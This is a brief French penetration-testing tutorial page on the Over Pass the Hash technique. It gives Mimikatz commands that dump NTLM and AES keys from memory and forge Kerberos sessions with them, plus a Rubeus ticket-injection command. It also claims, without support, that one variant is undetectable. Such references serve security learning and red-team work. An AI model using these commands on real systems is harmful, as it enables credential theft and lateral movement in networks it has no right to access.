🗡️Over Pass The Hash
Over Pass the hash est une combinaison de passage du hash et de passage du ticket. Permet la création de tickets Kerberos à partir de clés de hachage NTLM ou AES qui autorisent l'accès au service de ressources nécessitant une authentification Kerberos.
Avec Mimikatz
privilege::debug
sekurlsa::ekeys
ekeys va permettre d'afficher toutes les clés NTLM (RC4), AES128 et AES256 de la machine cible.
Ainsi, avec l'aide de la commande sekurlsa :: pth, nous pouvons essayer d'utiliser la clé ase256 ou aes128 pour le ticket Kerberos.
sekurlsa::pth /user:<username> /domain:<domain> /aes256:<hash>
sekurlsa::pth /user:<username> /domain:<domain> /aes128:<hash>
Si vous utilisez simultanément NTLM (RC4), ASE128, ASE256 pour l'injection dans le ticket Kerberos, cette étape est plus sécurisée et indétectable dans le réseau.
sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<hash> /aes128:<hash> /aes256:<hash>
sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<hash>
Avec Rubeus
Rubeus.exe asktgt /domain:<domain> /user:<username> /rc4:<hash> /ptt
Dernière mise à jour
Cet article vous a-t-il été utile ?